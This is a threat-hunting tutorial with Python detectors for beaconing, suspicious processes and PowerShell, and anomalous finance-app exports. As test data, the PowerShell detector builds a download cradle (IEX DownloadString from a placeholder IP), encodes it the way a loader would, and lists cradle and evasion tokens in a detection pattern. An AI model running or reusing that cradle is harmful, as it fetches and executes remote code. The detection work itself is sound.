Threat intelligence gathers information from multiple sources on the latest attack techniques and trends, together with Indicators of Compromise (IOCs) and Indicators of Attack (IOAs), and applies this actionable knowledge to strengthen an environment against attacks. Threat hunting takes a quite different approach: it assumes an advanced threat has already evaded the existing security controls. Working from context-driven hypotheses, a team of threat hunters – the Sherlock sort of cybersecurity specialists – proactively searches for those threats, analyzing patterns in network traffic and in the logs of existing devices and looking for abnormalities that may indicate a compromise.

What Types of Threats Can Be Hunted?

A key point is understanding the types of threats that can be hunted. By definition, a threat is any agent with the desire, capability and opportunity to do harm to an organization. This can be a rather long list, including disgruntled or dishonest employees, competitors, hacktivists, cybercriminals and even nation-states. Since threat hunting should be grounded in the organization's context, a good first step is defining which sort of threat the organization is most exposed to. That way, the motivations and techniques of that threat can be taken into consideration during the hunt, especially when devising the hypothesis that will be tested. For example: "Are any of our endpoints infected with new malware and remotely controlled by an unauthorized agent trying to steal confidential information?" Here are a few examples of the most common threats every organization should be hunting.

Abnormal Network Activity

It's quite common to say threat hunters are looking for the needle in the haystack, and it makes perfect sense. Hunting focuses on advanced threats which have already circumvented security controls and have remained hidden within, for example, the characteristic noise of a corporate network. One of the most common indicators used by hunters is repeated network traffic denied by a firewall. If a host is systematically being blocked when trying to reach an unusual destination, this may be an infected endpoint trying to tell its command-and-control server that it is alive and ready for further instructions; the regular, clock-like timing of such attempts is what distinguishes a beacon from a user or a misconfigured service retrying. Filtering out legitimate activity is a central task in threat hunting. Analysts can create a network traffic baseline and use it to filter legitimate traffic and isolate anomalous activity, such as unusual DNS requests and traffic whose port does not match the application actually speaking on it. Now, since anomalous does not mean malicious, hunters must find out whether these activities are trails left by attackers or explainable exceptions that can be added to the traffic baseline. Note that a beacon is not always denied: one that uses an allowed port such as 443 shows up as permitted traffic, so the same regularity check belongs on allowed connections too.
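To make the "systematically blocked host" hunt concrete, here is an added example (not code from the original article) that parses a constructed firewall deny log, drops tuples already explained by the traffic baseline, and flags source/destination pairs whose denies arrive at regular intervals. The log format, the baseline entry and the jitter threshold are all assumptions for the example; a real firewall export has its own fields and the parser is the part you would adapt.

```python
"""Hunt for beaconing in firewall deny logs (added example, not from the article).

The log format is a constructed, simplified one:
    <ISO timestamp> <ACTION> <src ip> <dst ip> <dst port>
Real firewall exports differ, so parse() is the part you would adapt.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample. 10.0.5.23 is denied to the same external host roughly
# every 60 seconds (a beacon); 10.0.9.9 is bursty and irregular (a scan or a
# misconfiguration); 10.0.1.10 -> 198.51.100.7:25 is a known, explained deny.
SAMPLE_LOG = """\
2024-03-01T10:00:00Z DENY 10.0.5.23 203.0.113.45 443
2024-03-01T10:00:05Z DENY 10.0.9.9 192.0.2.10 445
2024-03-01T10:00:06Z DENY 10.0.9.9 192.0.2.10 445
2024-03-01T10:00:30Z ALLOW 10.0.3.3 198.51.100.20 443
2024-03-01T10:00:40Z DENY 10.0.9.9 192.0.2.10 445
2024-03-01T10:00:42Z DENY 10.0.9.9 192.0.2.10 445
2024-03-01T10:01:01Z DENY 10.0.5.23 203.0.113.45 443
2024-03-01T10:01:10Z DENY 10.0.1.10 198.51.100.7 25
2024-03-01T10:02:00Z DENY 10.0.5.23 203.0.113.45 443
2024-03-01T10:02:15Z DENY 10.0.1.10 198.51.100.7 25
2024-03-01T10:03:02Z DENY 10.0.5.23 203.0.113.45 443
2024-03-01T10:03:59Z DENY 10.0.5.23 203.0.113.45 443
2024-03-01T10:04:00Z DENY 10.0.9.9 192.0.2.10 445
2024-03-01T10:05:00Z DENY 10.0.5.23 203.0.113.45 443
"""

# Traffic baseline: (src, dst, dport) tuples the team has already explained.
# Assumed for the example; in practice this grows as hunts close out exceptions.
BASELINE = {("10.0.1.10", "198.51.100.7", 25)}


def parse(log):
    """Return (timestamp, src, dst, dport) for every DENY line."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, action, src, dst, dport = line.split()
        if action != "DENY":
            continue
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst, int(dport)))
    return events


def find_beacons(events, baseline=BASELINE, min_hits=5, max_jitter=0.2):
    """Flag (src, dst, dport) groups outside the baseline whose denies arrive at
    regular intervals. Regularity is the coefficient of variation (stdev / mean)
    of the gaps between consecutive denies: a beacon with little jitter scores
    close to 0, bursty or human-driven traffic scores high."""
    groups = defaultdict(list)
    for ts, src, dst, dport in events:
        key = (src, dst, dport)
        if key not in baseline:
            groups[key].append(ts)

    findings = []
    for (src, dst, dport), times in groups.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg == 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            findings.append({
                "src": src, "dst": dst, "dport": dport, "hits": len(times),
                "avg_interval_s": round(avg, 1), "jitter": round(jitter, 3),
            })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse(SAMPLE_LOG)):
        print(finding)
```

On the sample, only 10.0.5.23 to 203.0.113.45:443 is reported (six denies, 60 s average interval, jitter about 0.03); the bursty 10.0.9.9 group has the same number of hits but fails the regularity test, and the baseline tuple is never considered. Real beacons add random sleep jitter, so the threshold is something to tune against your own traffic rather than a constant.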

Malicious/Unauthorized PowerShell Scripts

As expected, sorting out suspicious activity should not be limited to network traffic. For instance, it's quite usual for organizations to use PowerShell scripts for managing endpoints, and attackers know that. Using an approach similar to the one applied to network traffic, hunters can map the legitimate use cases of PowerShell (which scripts run, from which paths, launched by which parent processes) and investigate any use outside that map to confirm whether it is a valid exception (which should also be mapped) or part of an attack. This only works if there is something to hunt in: PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) records the code that actually executed, including the plaintext of commands passed with -EncodedCommand, so it should be enabled before the hunt starts.

(Figure: A malicious PowerShell script, probably trying to mine some cryptocurrency)

Processes and Binaries

A point of note: hunting is not alert-based. It is a continuous effort of looking for any evidence that could be the sign of an intrusion. For example, hunters can spot malicious processes and binaries by checking attributes such as specific names, file paths or file hashes, especially when threat intelligence is available. Other characteristics should also be used in the hunt, including the network activity of the process or binary, whether it makes changes to the registry, which process launched it and which child processes it creates. Again, the key point is not the attribute itself, but using these characteristics together to decide whether the behavior of the process or binary can be considered abnormal: a binary named like a system component but running from a user's profile directory, or an office application spawning a shell, is suspicious regardless of whether its hash is known.
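The two endpoint sections above (unauthorized PowerShell and suspicious processes/binaries) share the same data source, so here is one added example (not code from the original article) that runs both hunts over constructed process-creation records of the kind an EDR or Sysmon log provides. It checks a hash against a threat-intel IOC, catches a system-binary name running from a non-system path, flags an office application spawning a shell, decodes -EncodedCommand arguments, and compares scripts against an approved-script baseline. The hash, the approved script list, the suspicious-token pattern and all sample paths are assumptions for the example.

```python
"""Hunt endpoint process telemetry for unauthorized PowerShell and suspicious
binaries (added example, not from the article). Every hash, path and list
below is a constructed assumption."""
import base64
import re
from pathlib import PureWindowsPath

# Threat-intel IOC: a hash reported as malicious (constructed value).
KNOWN_BAD_SHA256 = {"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08"}
# Baseline of PowerShell scripts the admin team actually runs (assumed).
APPROVED_PS_SCRIPTS = {r"c:\admin\scripts\patch-check.ps1", r"c:\admin\scripts\inventory.ps1"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "services.exe", "csrss.exe", "explorer.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Tokens common in download cradles and evasion, rare in admin scripts.
SUSPICIOUS_PS = re.compile(
    r"downloadstring|invoke-expression|\biex\b|frombase64string|-nop\b|-w(indowstyle)?\s+hidden|bypass",
    re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None when there is none or it does not decode."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Score each process event against IOCs, name/path expectations,
    parent-child relationships and the PowerShell baseline."""
    findings = []
    for ev in events:
        reasons = []
        image = PureWindowsPath(ev["image"])
        name = image.name.lower()
        parent = PureWindowsPath(ev["parent"]).name.lower()

        if ev.get("sha256") in KNOWN_BAD_SHA256:
            reasons.append("hash matches threat-intel IOC")
        # A system binary name outside the system directories is masquerading.
        if name in SYSTEM_BINARIES and not str(image.parent).lower().startswith(SYSTEM_DIRS):
            reasons.append(f"{name} running from non-system path {image.parent}")
        if parent in OFFICE_APPS and name in SHELLS:
            reasons.append(f"{parent} spawned {name}")

        if name in ("powershell.exe", "pwsh.exe"):
            cmd = ev["cmdline"]
            decoded = decode_encoded_command(cmd)
            if decoded:
                reasons.append("encoded command decodes to: " + decoded[:60])
                cmd = cmd + " " + decoded  # inspect the plaintext as well
            script = re.search(r"([a-z]:\\[^\s\"']+\.ps1)", cmd, re.I)
            if script and script.group(1).lower() not in APPROVED_PS_SCRIPTS:
                reasons.append(f"script not in baseline: {script.group(1)}")
            if SUSPICIOUS_PS.search(cmd):
                reasons.append("suspicious PowerShell tokens in command line")

        if reasons:
            findings.append({"host": ev["host"], "image": ev["image"], "reasons": reasons})
    return findings


# Constructed sample events. The encoded payload is built here the same way an
# attacker's loader would build it (UTF-16LE, then base64).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "WS-0001", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "sha256": "0" * 64,
     "cmdline": "svchost.exe -k netsvcs"},
    {"host": "WS-0002", "parent": r"C:\Windows\System32\svchost.exe", "image": PS_EXE,
     "sha256": "1" * 64, "cmdline": r"powershell.exe -File C:\Admin\Scripts\patch-check.ps1"},
    {"host": "WS-0042", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Users\Public\svchost.exe",
     "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
     "cmdline": "svchost.exe"},
    {"host": "WS-0017", "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": PS_EXE, "sha256": "1" * 64, "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"host": "WS-0099", "parent": r"C:\Windows\System32\cmd.exe", "image": PS_EXE, "sha256": "1" * 64,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\bob\AppData\Local\Temp\update.ps1"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The two legitimate records (a real svchost.exe under services.exe and the approved patch-check.ps1) produce nothing; the other three are each reported with the list of reasons, which is what the hunter takes to the owner of the host to confirm or explain. Note that the hash match is only one of several reasons on WS-0042: the masquerading path would have been caught even with no threat intelligence at all.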

Unusual Behavior in Application Usage

Many times a deeper investigation is necessary. Many network compromises and data breaches look like authorized activity, even to the point of using valid, previously stolen credentials, so from a hunter's point of view it does not matter that the authentication completed without a problem. The question is whether the access fits the user's usual behavior, or whether the actions taken once access was granted can be considered suspicious. This phase of the hunting process is normally quite interactive, as hunters may ask IT or even non-technical staff to confirm whether abnormalities in the OS, in application use cases and in data flow are normal or a threat. For example, creating a report from a finance application is a common task, but if a user, even with valid credentials, is systematically exporting data (e.g. the customer list, banking information, personal data) in a way that is not usual for that user, it should be investigated. And if this valid user is accessing the financial application from the same host that was identified with an unauthorized PowerShell script or abnormal network activity, that is a red flag for the hunter: it's quite probable an unknown agent is trying to exfiltrate data.
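The export scenario above can be hunted from the application's own audit log, and here is an added example (not code from the original article) that does so: it builds a per-user baseline of daily export volume and usual report types from constructed history, flags today's exports that exceed it or use a report type the user never ran before, and raises the severity when the export came from a host that another hunt (network or endpoint) has already flagged. The history, the day's events, the flagged-host set and the thresholds are all assumptions for the example.

```python
"""Hunt application audit logs for unusual data exports by valid users and
correlate them with hosts already flagged by other hunts (added example, not
from the article). History, events and the flagged-host set are constructed."""
from collections import defaultdict
from statistics import median

# Per-user baseline learned from earlier audit logs (assumed values): rows
# exported per working day and the report types each user normally runs.
HISTORY = {
    "alice": {"daily_rows": [320, 410, 380, 450, 300], "reports": {"invoice_summary"}},
    "bob":   {"daily_rows": [21000, 19500, 22000, 20500, 20000], "reports": {"gl_dump"}},
    "carol": {"daily_rows": [100, 150, 120], "reports": {"expense_report"}},
}

# Today's export events from the finance application (constructed).
TODAY = [
    {"user": "alice", "host": "WS-0017", "report": "customer_list", "rows": 48000},
    {"user": "bob",   "host": "WS-0003", "report": "gl_dump", "rows": 25000},
    {"user": "carol", "host": "WS-0008", "report": "bank_accounts", "rows": 200},
    {"user": "carol", "host": "WS-0008", "report": "expense_report", "rows": 90},
]

# Hosts flagged by the network or endpoint hunts (assumed input).
FLAGGED_HOSTS = {"WS-0017"}


def hunt_exports(events, history, flagged_hosts, ratio=5.0, min_rows=1000):
    """Flag users whose export volume exceeds ratio x their median day (and at
    least min_rows, so tiny baselines do not fire on noise) or who ran a report
    type absent from their baseline. Severity is raised to high when the same
    host already appears in another hunt's findings."""
    per_user = defaultdict(lambda: {"rows": 0, "hosts": set(), "reports": set()})
    for ev in events:
        agg = per_user[ev["user"]]
        agg["rows"] += ev["rows"]
        agg["hosts"].add(ev["host"])
        agg["reports"].add(ev["report"])

    findings = []
    for user, agg in per_user.items():
        base = history.get(user)
        if base is None:
            continue  # no baseline yet: build one before hunting this user
        reasons = []
        typical = median(base["daily_rows"])
        if agg["rows"] > max(min_rows, ratio * typical):
            reasons.append(f"{agg['rows']} rows exported vs typical {typical:.0f}")
        new_reports = agg["reports"] - base["reports"]
        if new_reports:
            reasons.append("unusual report types: " + ", ".join(sorted(new_reports)))
        if reasons:
            on_flagged = agg["hosts"] & flagged_hosts
            findings.append({
                "user": user, "hosts": sorted(agg["hosts"]), "reasons": reasons,
                "severity": "high" if on_flagged else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in hunt_exports(TODAY, HISTORY, FLAGGED_HOSTS):
        print(finding)
```

On the sample, bob's 25,000-row gl_dump is large in absolute terms but normal for him and is not reported; alice's 48,000-row customer_list is both far above her baseline and a report she never ran, and because it came from WS-0017, a host already flagged elsewhere, it is reported as high severity; carol's bank_accounts export is small but new for her and comes back as medium, the sort of finding that is settled by asking her manager. Keeping the per-user baseline rather than a single global threshold is what stops the bulk-export job from drowning out the actual anomaly.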

Conclusion

It should be clear that threat hunting is all about knowing your environment and anticipating the actions of an attacker based on their motivations. Hunters must know what the high-value targets are and use their expertise to pin down the weak spots in the organization's defenses, much as an attacker would. Staying ahead of current cyberthreats is not an easy task: it requires not only a detailed understanding of the context the organization is in, but also sufficient visibility (network and endpoint logging that is actually enabled and retained) and evidence-based, actionable intelligence for choosing the best course of action when malicious activity is found. A mature threat-hunting process goes well beyond traditional security tactics, enabling a systematic, proactive approach in which the hunted becomes the hunter. Corporations today no longer have the luxury of wondering whether a security breach will occur. Instead they should assume an attacker may already have compromised critical systems and take swift action to keep the impact below an unacceptable level.